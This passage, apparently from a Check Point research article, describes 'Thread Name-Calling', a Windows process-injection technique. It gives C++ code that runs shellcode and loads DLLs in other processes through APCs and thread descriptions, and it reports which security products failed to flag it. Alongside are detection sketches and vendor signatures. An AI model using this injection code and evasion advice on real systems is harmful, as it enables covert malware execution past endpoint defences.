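The argument-count constraint can be expressed as a compile-time check. The sketch below is illustrative only: the `*_like` prototypes are stand-ins that mirror the documented parameter counts of RtlMoveMemory, VirtualAlloc and VirtualProtect, and `fits_in_apc` is a hypothetical helper, not part of any Windows API.

```cpp
#include <cstddef>

// Counts the parameters of a plain function type.
template <typename F> struct arity;
template <typename R, typename... Args>
struct arity<R(Args...)> {
    static constexpr std::size_t value = sizeof...(Args);
};

// A user APC routine receives three caller-supplied arguments.
constexpr std::size_t kApcArgumentCount = 3;

// Stand-in prototypes (declarations only, never called).
void* move_memory_like(void* dst, const void* src, std::size_t len);
void* virtual_alloc_like(void* addr, std::size_t size, unsigned long type, unsigned long protect);
int virtual_protect_like(void* addr, std::size_t size, unsigned long newProtect, unsigned long* oldProtect);

// True when every parameter of F can be supplied through a single APC.
template <typename F>
constexpr bool fits_in_apc() {
    return arity<F>::value <= kApcArgumentCount;
}

static_assert(fits_in_apc<decltype(move_memory_like)>(), "3 arguments fit");
static_assert(!fits_in_apc<decltype(virtual_alloc_like)>(), "4 arguments do not fit");
static_assert(!fits_in_apc<decltype(virtual_protect_like)>(), "4 arguments do not fit");
```

A function with fewer parameters still fits, because the surplus APC arguments are simply ignored by the callee; the problem only arises when a fourth value has to be controlled.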
An alternative is to use the buffer that we already have (allocated on the heap), and just change its memory protection. We can do it by calling VirtualProtectEx. Changing the memory protection of the page within the remote process is still suspicious, but the advantage of this method is that it requires fewer steps than the one presented earlier. Again, calling the local equivalent of the function, VirtualProtect, remotely has the same problems as calling VirtualAlloc.
Still, it is possible to change the memory protection or allocate memory by calling VirtualAlloc/VirtualProtect remotely with the help of ROP (included as one of the options in our PoC code). But this method comes with its own problems, and a different set of suspicious indicators. It requires using APIs for direct thread manipulation (SuspendThread/ResumeThread, SetThreadContext/GetThreadContext). According to the tests we performed, that raises even more alerts, and will result in our injector being flagged by many AV/EDR products. In addition, allocating executable memory from within the process will fail if it has the DCP (Dynamic Code Prohibited) enabled.
After considering all the pros and cons, we decided to keep things simple and just call VirtualProtectEx. The second snippet illustrates the alternative version, with VirtualAllocEx.
Once our shellcode is in the executable memory region, we are ready to run it. We use another APC to trigger the execution (requires a thread handle with THREAD_SET_CONTEXT access). Additionally, we may use the aforementioned function, RtlDispatchAPC, as a proxy to call the injected code.
Snippet illustrating the basic implementation:
bool run_injected_v1(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess, remotePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
        return false;
    }
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
    bool isOk = false;
    auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
    if (_RtlDispatchAPC) {
        // remotePtr is the buffer that was just made executable
        if (queue_apc_thread(hThread, _RtlDispatchAPC, remotePtr, 0, (void*)(-1))) {
            isOk = true;
        }
    }
    CloseHandle(hThread);
    return isOk;
}
Extended version, covering different possibilities:
bool run_injected(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
    void* shellcodePtr = remotePtr;
#ifdef USE_EXISTING_THREAD
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
#else
    HANDLE hThread = create_alertable_thread(hProcess);
#endif
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
#ifdef USE_NEW_BUFFER
    shellcodePtr = VirtualAllocEx(hProcess, nullptr, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!shellcodePtr) {
        std::cout << "Failed to allocate!" << std::hex << GetLastError() << "\n";
        return false;
    }
    std::cout << "Allocated: " << std::hex << shellcodePtr << "\n";
    void* _RtlMoveMemoryPtr = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlMoveMemory");
    if (!_RtlMoveMemoryPtr) {
        std::cerr << "Failed retrieving: _RtlMoveMemoryPtr\n";
        return false;
    }
    if (!queue_apc_thread(hThread, _RtlMoveMemoryPtr, shellcodePtr, remotePtr, (void*)payload_len)) {
        return false;
    }
    std::cout << "Added RtlMoveMemory to the thread queue!\n";
#else
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess, shellcodePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
        return false;
    }
    std::cout << "Protection changed! Old: " << std::hex << oldProtect << "\n";
#endif
    bool isOk = false;
    auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
    if (_RtlDispatchAPC) {
        std::cout << "Using RtlDispatchAPC\n";
        if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
            isOk = true;
        }
    }
    else {
        if (queue_apc_thread(hThread, shellcodePtr, 0, 0, 0)) {
            isOk = true;
        }
    }
    if (isOk) std::cout << "Added to the thread queue!\n";
#ifndef USE_EXISTING_THREAD
    ResumeThread(hThread);
#endif
    CloseHandle(hThread);
    return isOk;
}
And it works!
See in action
Video demo: https://youtu.be/1BJaxHh91p4
As we found during our tests, although we call a potentially suspicious API (VirtualProtectEx or VirtualAllocEx), for most of the products this indicator alone was not enough to flag the payload: it was not registered that we are using an injected buffer.
During our research, we assessed several different methods of making the injected buffer executable. Unfortunately, each of those methods has its flaws. The most straightforward way is to use an API that operates on the process, such as VirtualProtectEx or VirtualAllocEx, but using those functions may draw unwanted attention. The alternative is calling the functions VirtualProtect or VirtualAlloc remotely, via ROP. However, this involves a set of APIs that are even more suspicious, so we decided to stick with the simpler alternative.
The presence of a page with RWX access rights is another indicator that will be quickly picked up by memory scanners. Using just a few more calls, we can easily implement a scenario where we allocate a new memory region with Read/Write access, copy the injected buffer there, and then change it to Read/eXecute. Also, once we have our code executed within the context of a remote process, nothing stops us from pivoting further, allocating additional memory within it (as long as the process does not use DCP policy), and moving the payload, changing the access rights back to the initial ones.
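To make the RWX indicator concrete, the sketch below shows the kind of check a memory scanner might apply to a protection value, and why a Read/Write then Read/eXecute sequence does not trip it. It is a simplified model, not the logic of any particular product. The constants repeat the documented Windows memory-protection values so that the example builds on any platform; the function names are hypothetical.

```cpp
#include <cstdint>
#include <vector>

// Values mirror the documented Windows memory-protection constants.
constexpr std::uint32_t kPageReadWrite        = 0x04;  // PAGE_READWRITE
constexpr std::uint32_t kPageExecuteRead      = 0x20;  // PAGE_EXECUTE_READ
constexpr std::uint32_t kPageExecuteReadWrite = 0x40;  // PAGE_EXECUTE_READWRITE
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80;  // PAGE_EXECUTE_WRITECOPY

// True when a protection value allows writing and executing at the same time.
constexpr bool is_writable_and_executable(std::uint32_t protect) {
    const std::uint32_t base = protect & 0xFF;  // drop modifier bits such as PAGE_GUARD
    return base == kPageExecuteReadWrite || base == kPageExecuteWriteCopy;
}

// True when any step of a protection sequence exposes a writable+executable page.
inline bool sequence_exposes_wx(const std::vector<std::uint32_t>& steps) {
    for (std::uint32_t protect : steps) {
        if (is_writable_and_executable(protect)) return true;
    }
    return false;
}
```

Under this model, `{kPageExecuteReadWrite}` is flagged while `{kPageReadWrite, kPageExecuteRead}` is not, which is why a scanner that looks only at the current protection needs additional signals, such as the transition from writable to executable itself.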
If needed, we can also further reduce access rights with which the process has to be opened, as described at the beginning of the chapter.
DLL injection is one of the well-known techniques of augmenting a running process with our code. It is not a particularly stealthy technique, because it calls LoadLibrary on the payload (DLL), which has to be dropped on the disk first. In addition, the mere fact of loading a PE via the standard API generates a kernel callback which can be used for detection. Nevertheless, it is one of the simple techniques that can be useful in some cases, and it is worthwhile to have in our arsenal.
Typical implementation of DLL injection involves:
VirtualAllocEx – to allocate memory for a DLL path within the remote process
WriteProcessMemory – to write the path into the allocated memory
CreateRemoteThread (or equivalents) – to call LoadLibrary remotely (passing it the pointer to the written path). Some variants may involve running LoadLibrary via APC instead of a new thread.
In this section we propose an alternative implementation that does not require the write access right to the target process, and involves non-standard APIs:
SetThreadDescription + NtQueueApcThreadEx2 with GetThreadDescription – for remote memory allocation + writing the path to the remote process
NtQueueApcThreadEx2 – to call LoadLibrary remotely (but of course we can also use a new thread, like in the classic implementation)
The first step can be implemented exactly as in the Thread Name-Calling implementation (described under: “Remote write with the help of thread description”). Snippet:
const wchar_t* buf = dllName.c_str();
void* remotePtr = get_peb_unused(hProcess);
wchar_t* wPtr = pass_via_thread_name(hProcess, buf, remotePtr);
In contrast to Thread Name-Calling, we don’t have to change the access rights to our injected buffer, so the second step is very simple.
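bool inject_with_loadlibrary(HANDLE hProcess, PVOID remote_ptr)
{
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
    // remote_ptr points to the DLL path written via the thread description
    bool isOk = queue_apc_thread(hThread, LoadLibraryW, remote_ptr, 0, 0);
    CloseHandle(hThread);
    return isOk;
}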
See in action
Video demo: https://youtu.be/8cSNgE3gZxY
The described techniques were tested on Windows 10 and Windows 11. List of the tested versions:
Version 10.0.19045 Build 19045 (Windows 10 Enterprise, 64 bit)
Version 10.0.22621 Build 22000 (Windows 11 Pro, 64 bit)
Version 10.0.22621 Build 22621 (Windows 11 Pro, 64 bit - Windows 11 v22H2)
Version 10.0.22631 Build 22631 (Windows 11 Pro, 64 bit - Windows 11 v23H2)
The intended target is a 64-bit process. The following mitigation policies may be set:
DWORD64 MitgFlags = PROCESS_CREATION_MITIGATION_POLICY_CONTROL_FLOW_GUARD_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON // won't work with the version calling VirtualProtect/VirtualAlloc via ROP
    | PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON
    | PROCESS_CREATION_MITIGATION_POLICY2_MODULE_TAMPERING_PROTECTION_ALWAYS_ON
    ;
Thread Name-Calling won’t work on processes that have the following mitigation policy set:
PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON
The complete source code, containing the implementation of described techniques, can be found in the following repository:
https://github.com/hasherezade/thread_namecalling
As new APIs are added to Windows, new ideas for injection techniques are appearing. To implement effective detection we must always keep an eye on the changing landscape. Fortunately, Microsoft also works on implementing more visibility for anti-malware products, and currently most of the important APIs can be monitored with the help of ETW events.
Thread Name-Calling uses some of the relatively new APIs. However, it cannot avoid incorporating older well-known components, such as APC injections – APIs which should always be taken into consideration as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity. However, even those indicators, when used out of the typical sequence of calls, may be overlooked by some of the AV and EDR products.
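From the defender's side, the point about indicators appearing outside the typical sequence of calls suggests correlating events rather than judging each call alone. The following is a minimal sketch of that idea under stated assumptions: the `Event` values are invented, simplified labels and do not correspond to a real ETW schema, and the matching is a plain ordered-subsequence test.

```cpp
#include <cstddef>
#include <vector>

// Hypothetical, simplified telemetry events for one source/target process pair.
enum class Event {
    SetThreadDescription,            // description set on a thread of another process
    QueueApcToGetThreadDescription,  // remote APC whose routine is GetThreadDescription
    RemoteProtectToExecutable,       // VirtualProtectEx making remote memory executable
    QueueApcForExecution,            // remote APC that ends up running the buffer
    Other
};

// True when `pattern` occurs in `log` as an ordered, not necessarily contiguous,
// subsequence, so unrelated calls in between do not hide the chain.
inline bool contains_in_order(const std::vector<Event>& log,
                              const std::vector<Event>& pattern) {
    std::size_t matched = 0;
    for (Event e : log) {
        if (matched < pattern.size() && e == pattern[matched]) ++matched;
    }
    return matched == pattern.size();
}

// The chain of calls described in this article, expressed as one pattern.
inline const std::vector<Event>& name_calling_pattern() {
    static const std::vector<Event> pattern{
        Event::SetThreadDescription,
        Event::QueueApcToGetThreadDescription,
        Event::RemoteProtectToExecutable,
        Event::QueueApcForExecution};
    return pattern;
}
```

A real detection would also need to tie the events to the same target process and buffer address, and to tolerate the variants discussed earlier, for example VirtualAllocEx plus RtlMoveMemory in place of VirtualProtectEx.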
Check Point customers remain protected from the threats described in this research.
Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.
Check Point’s Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise. Behavioral Guard protections were developed and deployed to protect customers against the threats described in this research.
TE/Harmony Endpoint protections:
Behavioral.Win.ImageModification.C
Behavioral.Win.ImageModification.F
https://attack.mitre.org/techniques/T1055
https://twitter.com/Hexacorn/status/1317424213951733761
https://twitter.com/_Gal_Yaniv/status/1353630677493837825
https://blahcat.github.io/posts/2019/03/17/small-dumps-in-the-big-pool.html
https://gitlab.com/ORCA000/t.d.p
https://www.lodsb.com/shellcode-injection-using-threadnameinformation
https://modexp.wordpress.com/2019/08/27/process-injection-apc/
https://repnz.github.io/posts/apc/user-apc/#ntqueueapcthreadex-meet-special-user-apc
https://www.deepinstinct.com/blog/inject-me-x64-injection-less-code-injection